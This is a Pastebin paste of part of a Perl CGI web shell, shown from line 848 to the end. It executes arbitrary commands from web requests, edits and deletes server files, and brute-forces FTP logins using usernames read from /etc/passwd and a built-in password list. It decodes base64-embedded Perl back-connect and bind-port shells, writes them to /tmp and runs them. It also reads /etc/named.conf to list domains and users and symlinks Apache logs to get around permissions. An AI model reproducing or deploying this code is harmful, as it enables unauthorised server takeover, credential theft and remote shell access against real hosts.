  848.         $result .= &RunCmd;
  849.     }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
  850.     {
  851.         $result .=  &SaveFileForm;
  852.     }else
  853.     {
  854.         $result .= &PrintCommandLineInputForm;
  855.         $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
  856.         $result .=&RunCmd;
  857.     }
  858.     $result .=  "</textarea>";
  859.     return $result;
  860. }
  861.  
  862. #------------------------------------------------------------------------
  863. # run command
  864. #------------------------------------------------------------------------
  865.  
  866. sub RunCmd
  867. {
  868.     my $result="";
  869.     $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  870.     if(!$WinNT)
  871.     {
  872.         $SIG{'ALRM'} = \&CommandTimeout;
  873.         alarm($CommandTimeoutDuration);
  874.     }
  875.     if($ShowDynamicOutput) # show output as it is generated
  876.     {
  877.         $|=1;
  878.         $Command .= " |";
  879.         open(CommandOutput, $Command);
  880.         while(<CommandOutput>)
  881.         {
  882.             $_ =~ s/(\n|\r\n)$//;
  883.             $result .= &HtmlSpecialChars("$_\n");
  884.         }
  885.         $|=0;
  886.     }
  887.     else # show output after command completes
  888.     {
  889.         $result .= &HtmlSpecialChars('$Command');
  890.     }
  891.     if(!$WinNT)
  892.     {
  893.         alarm(0);
  894.     }
  895.     return $result;
  896. }
  897. #==============================================================================
  898. # Form Save File
  899. #==============================================================================
  900. sub SaveFileForm
  901. {
  902.     my $result ="";
  903.     substr($RunCommand,0,5)="";
  904.     my $file=&trim($RunCommand);
  905.     $save='<br><input name="a" type="submit" value="save" class="submit" >';
  906.     $File=$CurrentDir.$PathSep.$RunCommand;
  907.     my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
  908.     if(-w $File)
  909.     {
  910.         $rows="23"
  911.     }else
  912.     {
  913.         $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
  914.         $rows="20"
  915.     }
  916.     $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
  917.     $read=($WinNT)?"type":"less";
  918.     $RunCommand = "$read \"$RunCommand\"";
  919.     $result .=  <<END;
  920.     <form name="f" method="POST" action="$ScriptLocation">
  921.  
  922.     <input type="hidden" name="d" value="$CurrentDir">
  923.     $Prompt
  924.     <input type="text" size="40" name="c">
  925.     <input name="s" class="submit" type="submit" value="Enter">
  926.     <br>Command: <run> $RunCommand </run>
  927.     <input type="hidden" name="file" value="$file" > $save <br> $msg
  928.     <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
  929. END
  930.    
  931.     $result .= &RunCmd;
  932.     $result .=  "</textarea>";
  933.     $result .=  "</form>";
  934.     return $result;
  935. }
  936. #==============================================================================
  937. # Save File
  938. #==============================================================================
  939. sub SaveFile($)
  940. {
  941.     my $Data= shift ;
  942.     my $File= shift;
  943.     $File=$CurrentDir.$PathSep.$File;
  944.     if(open(FILE, ">$File"))
  945.     {
  946.         binmode FILE;
  947.         print FILE $Data;
  948.         close FILE;
  949.         return 1;
  950.     }else
  951.     {
  952.         return 0;
  953.     }
  954. }
  955. #------------------------------------------------------------------------------
  956. # Brute Forcer Form
  957. #------------------------------------------------------------------------------
  958. sub BruteForcerForm
  959. {
  960.     my $result="";
  961.     $result .= <<END;
  962.  
  963. <table>
  964.  
  965. <tr>
  966. <td colspan="2" align="center">
  967. ####################################<br>
  968. Simple FTP brute forcer<br>
  969. ####################################
  970. <form name="f" method="POST" action="$ScriptLocation">
  971.  
  972. <input type="hidden" name="a" value="bruteforcer"/>
  973. </td>
  974. </tr>
  975. <tr>
  976. <td>User:<br><textarea rows="18" cols="30" name="user">
  977. END
  978. chop($result .= `less /etc/passwd | cut -d: -f1`);
  979. $result .= <<'END';
  980. </textarea></td>
  981. <td>
  982.  
  983. Pass:<br>
  984. <textarea rows="18" cols="30" name="pass">123pass
  985. 123!@#
  986. 123admin
  987. 123abc
  988. 123456admin
  989. 1234554321
  990. 12344321
  991. pass123
  992. admin
  993. admincp
  994. administrator
  995. matkhau
  996. passadmin
  997. p@ssword
  998. p@ssw0rd
  999. password
  1000. 123456
  1001. 1234567
  1002. 12345678
  1003. 123456789
  1004. 1234567890
  1005. 111111
  1006. 000000
  1007. 222222
  1008. 333333
  1009. 444444
  1010. 555555
  1011. 666666
  1012. 777777
  1013. 888888
  1014. 999999
  1015. 123123
  1016. 234234
  1017. 345345
  1018. 456456
  1019. 567567
  1020. 678678
  1021. 789789
  1022. 123321
  1023. 456654
  1024. 654321
  1025. 7654321
  1026. 87654321
  1027. 987654321
  1028. 0987654321
  1029. admin123
  1030. admin123456
  1031. abcdef
  1032. abcabc
  1033. !@#!@#
  1034. !@#$%^
  1035. !@#$%^&*(
  1036. !@#$$#@!
  1037. abc123
  1038. anhyeuem
  1039. iloveyou</textarea>
  1040. </td>
  1041. </tr>
  1042. <tr>
  1043. <td colspan="2" align="center">
  1044. Sleep:<select name="sleep">
  1045.  
  1046. <option>0</option>
  1047. <option>1</option>
  1048. <option>2</option>
  1049.  
  1050. <option>3</option>
  1051. </select>
  1052. <input type="submit" class="submit" value="Brute Forcer"/></td></tr>
  1053. </form>
  1054. </table>
  1055. END
  1056. return $result;
  1057. }
  1058. #------------------------------------------------------------------------------
  1059. # Brute Forcer
  1060. #------------------------------------------------------------------------------
  1061. sub BruteForcer
  1062. {
  1063.     my $result="";
  1064.     $Server=$ENV{'SERVER_ADDR'};
  1065.     if($in{'user'} eq "")
  1066.     {
  1067.         $result .= &BruteForcerForm;
  1068.     }else
  1069.     {
  1070.         use Net::FTP;
  1071.         @user= split(/\n/, $in{'user'});
  1072.         @pass= split(/\n/, $in{'pass'});
  1073.         chomp(@user);
  1074.         chomp(@pass);
  1075.         $result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
  1076.         foreach $username (@user)
  1077.         {
  1078.             if(!($username eq ""))
  1079.             {
  1080.                 foreach $password (@pass)
  1081.                 {
  1082.                     $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
  1083.                     if($ftp->login("$username","$password"))
  1084.                     {
  1085.                         $result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
  1086.                         $ftp->quit();
  1087.                         break;
  1088.                     }
  1089.                     if(!($in{'sleep'} eq "0"))
  1090.                     {
  1091.                         sleep(int($in{'sleep'}));
  1092.                     }
  1093.                     $ftp->quit();
  1094.                 }
  1095.             }
  1096.         }
  1097.         $result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
  1098.     }
  1099.     return $result;
  1100. }
  1101. #------------------------------------------------------------------------------
  1102. # Backconnect Form
  1103. #------------------------------------------------------------------------------
  1104. sub BackBindForm
  1105. {
  1106.     return <<END;
  1107.     <br><br>
  1108.  
  1109.     <table>
  1110.     <tr>
  1111.     <form name="f" method="POST" action="$ScriptLocation">
  1112.     <td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
  1113.     <td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
  1114.      Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
  1115.  
  1116.     <td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
  1117.     </form>
  1118.     </tr>
  1119.     <tr>
  1120.     <td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
  1121.     <br>[+] Try check your Port with <a target="_blank" href="http://www.canyouseeme.org/">http://www.canyouseeme.org/</a>
  1122.     <br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
  1123.  
  1124.     </tr>
  1125.     </table>
  1126.  
  1127.     <br><br>
  1128.     <table>
  1129.     <tr>
  1130.     <form method="POST" action="$ScriptLocation">
  1131.     <td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
  1132.  
  1133.     <td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
  1134.  
  1135.      Password: <input type="text" size="15" name="bindpass" value="berandal"></td>
  1136.     <td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
  1137.     </form>
  1138.     </tr>
  1139.     <tr>
  1140.     <td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
  1141.     <br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
  1142.  
  1143.     </tr>
  1144.     </table><br>
  1145. END
  1146. }
  1147. #------------------------------------------------------------------------------
  1148. # Backconnect use perl
  1149. #------------------------------------------------------------------------------
  1150. sub BackBind
  1151. {
  1152.     use MIME::Base64;
  1153.     use Socket;
  1154.     $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7";
  1155.     $bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo=";
  1156.  
  1157.     $ClientAddr = $in{'clientaddr'};
  1158.     $ClientPort = int($in{'clientport'});
  1159.     if($ClientPort eq 0)
  1160.     {
  1161.         return &BackBindForm;
  1162.     }elsif(!$ClientAddr eq "")
  1163.     {
  1164.         $Data=decode_base64($backperl);
  1165.         if(-w "/tmp/")
  1166.         {
  1167.             $File="/tmp/backconnect.pl";   
  1168.         }else
  1169.         {
  1170.             $File=$CurrentDir.$PathSep."backconnect.pl";
  1171.         }
  1172.         open(FILE, ">$File");
  1173.         print FILE $Data;
  1174.         close FILE;
  1175.         system("perl backconnect.pl $ClientAddr $ClientPort");
  1176.         unlink($File);
  1177.         exit 0;
  1178.     }else
  1179.     {
  1180.         $Data=decode_base64($bindperl);
  1181.         if(-w "/tmp")
  1182.         {
  1183.             $File="/tmp/bindport.pl";  
  1184.         }else
  1185.         {
  1186.             $File=$CurrentDir.$PathSep."bindport.pl";
  1187.         }
  1188.         open(FILE, ">$File");
  1189.         print FILE $Data;
  1190.         close FILE;
  1191.         system("perl bindport.pl $ClientPort");
  1192.         unlink($File);
  1193.         exit 0;
  1194.     }
  1195. }
  1196. #------------------------------------------------------------------------------
  1197. #  Array List Directory
  1198. #------------------------------------------------------------------------------
  1199. sub RmDir($)
  1200. {
  1201.     my $dir = shift;
  1202.     if(opendir(DIR,$dir))
  1203.     {
  1204.         while($file = readdir(DIR))
  1205.         {
  1206.             if(($file ne ".") && ($file ne ".."))
  1207.             {
  1208.                 $file= $dir.$PathSep.$file;
  1209.                 if(-d $file)
  1210.                 {
  1211.                     &RmDir($file);
  1212.                 }
  1213.                 else
  1214.                 {
  1215.                     unlink($file);
  1216.                 }
  1217.             }
  1218.         }
  1219.         closedir(DIR);
  1220.     }
  1221.     if(!rmdir($dir))
  1222.     {
  1223.        
  1224.     }
  1225. }
  1226. sub FileOwner($)
  1227. {
  1228.     my $file = shift;
  1229.     if(-e $file)
  1230.     {
  1231.         ($uid,$gid) = (stat($file))[4,5];
  1232.         if($WinNT)
  1233.         {
  1234.             return "???";
  1235.         }
  1236.         else
  1237.         {
  1238.             $name=getpwuid($uid);
  1239.             $group=getgrgid($gid);
  1240.             return $name."/".$group;
  1241.         }
  1242.     }
  1243.     return "???";
  1244. }
  1245. sub ParentFolder($)
  1246. {
  1247.     my $path = shift;
  1248.     my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
  1249.     chop($path = `$Comm`);
  1250.     return $path;
  1251. }
  1252. sub FilePerms($)
  1253. {
  1254.     my $file = shift;
  1255.     my $ur = "-";
  1256.     my $uw = "-";
  1257.     if(-e $file)
  1258.     {
  1259.         if($WinNT)
  1260.         {
  1261.             if(-r $file){ $ur = "r"; }
  1262.             if(-w $file){ $uw = "w"; }
  1263.             return $ur . " / " . $uw;
  1264.         }else
  1265.         {
  1266.             $mode=(stat($file))[2];
  1267.             $result = sprintf("%04o", $mode & 07777);
  1268.             return $result;
  1269.         }
  1270.     }
  1271.     return "0000";
  1272. }
  1273. sub FileLastModified($)
  1274. {
  1275.     my $file = shift;
  1276.     if(-e $file)
  1277.     {
  1278.         ($la) = (stat($file))[9];
  1279.         ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
  1280.         $y = $y + 1900;
  1281.         @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
  1282.         $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
  1283.         return $lmtime;
  1284.     }
  1285.     return "???";
  1286. }
  1287. sub FileSize($)
  1288. {
  1289.     my $file = shift;
  1290.     if(-f $file)
  1291.     {
  1292.         return -s $file;
  1293.     }
  1294.     return "0";
  1295.  
  1296. }
  1297. sub ParseFileSize($)
  1298. {
  1299.     my $size = shift;
  1300.     if($size <= 1024)
  1301.     {
  1302.         return $size. " B";
  1303.     }
  1304.     else
  1305.     {
  1306.         if($size <= 1024*1024)
  1307.         {
  1308.             $size = sprintf("%.02f",$size / 1024);
  1309.             return $size." KB";
  1310.         }
  1311.         else
  1312.         {
  1313.             $size = sprintf("%.2f",$size / 1024 / 1024);
  1314.             return $size." MB";
  1315.         }
  1316.     }
  1317. }
  1318. sub trim($)
  1319. {
  1320.     my $string = shift;
  1321.     $string =~ s/^\s+//;
  1322.     $string =~ s/\s+$//;
  1323.     return $string;
  1324. }
  1325. sub AddSlashes($)
  1326. {
  1327.     my $string = shift;
  1328.     $string=~ s/\\/\\\\/g;
  1329.     return $string;
  1330. }
  1331. sub ListDir
  1332. {
  1333.     my $path = $CurrentDir.$PathSep;
  1334.     $path=~ s/\\\\/\\/g;
  1335.     my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
  1336.     if(-d $path)
  1337.     {
  1338.         my @fname = ();
  1339.         my @dname = ();
  1340.         if(opendir(DIR,$path))
  1341.         {
  1342.             while($file = readdir(DIR))
  1343.             {
  1344.                 $f=$path.$file;
  1345.                 if(-d $f)
  1346.                 {
  1347.                     push(@dname,$file);
  1348.                 }
  1349.                 else
  1350.                 {
  1351.                     push(@fname,$file);
  1352.                 }
  1353.             }
  1354.             closedir(DIR);
  1355.         }
  1356.         @fname = sort { lc($a) cmp lc($b) } @fname;
  1357.         @dname = sort { lc($a) cmp lc($b) } @dname;
  1358.         $result .= "<div><table width='90%' class='listdir'>
  1359.  
  1360.         <tr style='background-color: #3e3e3e'><th>File Name</th>
  1361.         <th style='width:100px;'>File Size</th>
  1362.         <th style='width:150px;'>Owner</th>
  1363.         <th style='width:100px;'>Permission</th>
  1364.         <th style='width:150px;'>Last Modified</th>
  1365.         <th style='width:260px;'>Action</th></tr>";
  1366.         my $style="line";
  1367.         my $i=0;
  1368.         foreach my $d (@dname)
  1369.         {
  1370.             $style= ($style eq "line") ? "notline": "line";
  1371.             $d = &trim($d);
  1372.             $dirname=$d;
  1373.             if($d eq "..")
  1374.             {
  1375.                 $d = &ParentFolder($path);
  1376.             }
  1377.             elsif($d eq ".")
  1378.             {
  1379.                 $d = $path;
  1380.             }
  1381.             else
  1382.             {
  1383.                 $d = $path.$d;
  1384.             }
  1385.             $result .= "<tr class='$style'>
  1386.  
  1387.             <td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a  href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
  1388.             $result .= "<td>DIR</td>";
  1389.             $result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
  1390.             $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
  1391.             $result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
  1392.             $result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a>  | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
  1393.             $result .= "</tr>";
  1394.             $i++;
  1395.         }
  1396.         foreach my $f (@fname)
  1397.         {
  1398.             $style= ($style eq "line") ? "notline": "line";
  1399.             $file=$f;
  1400.             $f = $path.$f;
  1401.             $view = "?dir=".$path."&view=".$f;
  1402.             $result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
  1403.             $result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
  1404.             $result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
  1405.             $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
  1406.             $result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
  1407.             $result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
  1408.             $result .= "</tr>";
  1409.             $i++;
  1410.         }
  1411.         $result .= "</table></div>";
  1412.     }
  1413.     return $result;
  1414. }
  1415. #------------------------------------------------------------------------------
  1416. # Try to View List User
  1417. #------------------------------------------------------------------------------
  1418. sub ViewDomainUser
  1419. {
  1420.     open (domains, '/etc/named.conf') or $err=1;
  1421.     my @cnzs = <domains>;
  1422.     close d0mains;
  1423.     my $style="line";
  1424.     my $result="<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>";
  1425.     if ($err)
  1426.     {
  1427.         $result .=  ('<p>C0uldn\'t Bypass it , Sorry</p>');
  1428.         return $result;
  1429.     }else
  1430.     {
  1431.         $result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
  1432.     }
  1433.     foreach my $one (@cnzs)
  1434.     {
  1435.         if($one =~ m/.*?zone "(.*?)" {/)
  1436.         {  
  1437.             $style= ($style eq "line") ? "notline": "line";
  1438.             $filename= "/etc/valiases/".$one;
  1439.             $owner = getpwuid((stat($filename))[4]);
  1440.             $result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
  1441.         }
  1442.     }
  1443.     $result .= '</table>';
  1444.     return $result;
  1445. }
  1446. #------------------------------------------------------------------------------
  1447. # View Log
  1448. #------------------------------------------------------------------------------
  1449. sub ViewLog
  1450. {
  1451.     if($WinNT)
  1452.     {
  1453.         return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
  1454.     }
  1455.     my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
  1456.     my @pathlog=(
  1457.                 '/usr/local/apache/logs/error_log',
  1458.                 '/var/log/httpd/error_log',
  1459.                 '/usr/local/apache/logs/access_log'
  1460.                 );
  1461.     my $i=0;
  1462.     my $perms;
  1463.     my $sl;
  1464.     foreach my $log (@pathlog)
  1465.     {
  1466.         if(-w $log)
  1467.         {
  1468.             $perms="OK";
  1469.         }else
  1470.         {
  1471.             chop($sl = `ln -s $log error_log_$i`);
  1472.             if(&trim($ls) eq "")
  1473.             {
  1474.                 if(-r $ls)
  1475.                 {
  1476.                     $perms="OK";
  1477.                     $log="error_log_".$i;
  1478.                 }
  1479.             }else
  1480.             {
  1481.                 $perms="<font style='color: red;'>Cancel<font>";
  1482.             }
  1483.         }
  1484.         $result .=<<END;
  1485.         <tr>
  1486.  
  1487.             <form action="" method="post">
  1488.             <td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
  1489.             <td><input class="submit" type="submit" value="Try" /></td>
  1490.             <input type="hidden" id="log_$i" name="c" value="less $log"/>
  1491.             <input type="hidden" name="a" value="command" />
  1492.             <input type="hidden" name="d" value="$CurrentDir" />
  1493.             </form>
  1494.             <td>$perms</td>
  1495.  
  1496.         </tr>
  1497. END
  1498.         $i++;
  1499.     }
  1500.     $result .="</table>";
  1501.     return $result;
  1502. }
  1503. #------------------------------------------------------------------------------
  1504. # Main Program - Execution Starts Here
  1505. #------------------------------------------------------------------------------
  1506. &ReadParse;
  1507. &GetCookies;
  1508.  
  1509. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  1510. $ServerName = $ENV{'SERVER_NAME'};
  1511. $LoginPassword = $in{'p'};
  1512. $RunCommand = $in{'c'};
  1513. $TransferFile = $in{'f'};
  1514. $Options = $in{'o'};
  1515. $Action = $in{'a'};
  1516.  
  1517. $Action = "command" if($Action eq ""); # no action specified, use default
  1518.  
  1519. # get the directory in which the commands will be executed
  1520. $CurrentDir = &trim($in{'d'});
  1521. # mac dinh xuat thong tin neu ko co lenh nao!
  1522. $RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
  1523. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  1524.  
  1525. $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
  1526.  
  1527. if($Action eq "login" || !$LoggedIn)        # user needs/has to login
  1528. {
  1529.     &PerformLogin;
  1530. }elsif($Action eq "gui") # GUI directory
  1531. {
  1532.     &PrintPageHeader;
  1533.     if(!$WinNT)
  1534.     {
  1535.         $chmod=int($in{'chmod'});
  1536.         if(!($chmod eq 0))
  1537.         {
  1538.             $chmod=int($in{'chmod'});
  1539.             $file=$CurrentDir.$PathSep.$TransferFile;
  1540.             chop($result= `chmod $chmod "$file"`);
  1541.             if(&trim($result) eq "")
  1542.             {
  1543.                 print "<run> Done! </run><br>";
  1544.             }else
  1545.             {
  1546.                 print "<run> Sorry! You dont have permissions! </run><br>";
  1547.             }
  1548.         }
  1549.     }
  1550.     $rename=$in{'rename'};
  1551.     if(!$rename eq "")
  1552.     {
  1553.         if(rename($TransferFile,$rename))
  1554.         {
  1555.             print "<run> Done! </run><br>";
  1556.         }else
  1557.         {
  1558.             print "<run> Sorry! You dont have permissions! </run><br>";
  1559.         }
  1560.     }
  1561.     $remove=$in{'remove'};
  1562.     if($remove ne "")
  1563.     {
  1564.         $rm = $CurrentDir.$PathSep.$remove;
  1565.         if(-d $rm)
  1566.         {
  1567.             &RmDir($rm);
  1568.         }else
  1569.         {
  1570.             if(unlink($rm))
  1571.             {
  1572.                 print "<run> Done! </run><br>";
  1573.             }else
  1574.             {
  1575.                 print "<run> Sorry! You dont have permissions! </run><br>";
  1576.             }          
  1577.         }
  1578.     }
  1579.     print &ListDir;
  1580.  
  1581. }
  1582. elsif($Action eq "command")                 # user wants to run a command
  1583. {
  1584.     &PrintPageHeader("c");
  1585.     print &ExecuteCommand;
  1586. }
  1587. elsif($Action eq "save")                    # user wants to save a file
  1588. {
  1589.     &PrintPageHeader;
  1590.     if(&SaveFile($in{'data'},$in{'file'}))
  1591.     {
  1592.         print "<run> Done! </run><br>";
  1593.     }else
  1594.     {
  1595.         print "<run> Sorry! You dont have permissions! </run><br>";
  1596.     }
  1597.     print &ListDir;
  1598. }
  1599. elsif($Action eq "upload")                  # user wants to upload a file
  1600. {
  1601.     &PrintPageHeader;
  1602.  
  1603.     print &UploadFile;
  1604. }
  1605. elsif($Action eq "backbind")                # user wants to back connect or bind port
  1606. {
  1607.     &PrintPageHeader("clientport");
  1608.     print &BackBind;
  1609. }
  1610. elsif($Action eq "bruteforcer")             # user wants to brute force
  1611. {
  1612.     &PrintPageHeader;
  1613.     print &BruteForcer;
  1614. }elsif($Action eq "download")               # user wants to download a file
  1615. {
  1616.     print &DownloadFile;
  1617. }elsif($Action eq "checklog")               # user wants to view log file
  1618. {
  1619.     &PrintPageHeader;
  1620.     print &ViewLog;
  1621.  
  1622. }elsif($Action eq "domainsuser")            # user wants to view list user/domain
  1623. {
  1624.     &PrintPageHeader;
  1625.     print &ViewDomainUser;
  1626. }elsif($Action eq "logout")                 # user wants to logout
  1627. {
  1628.     &PerformLogout;
  1629. }
  1630. &PrintPageFooter;
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top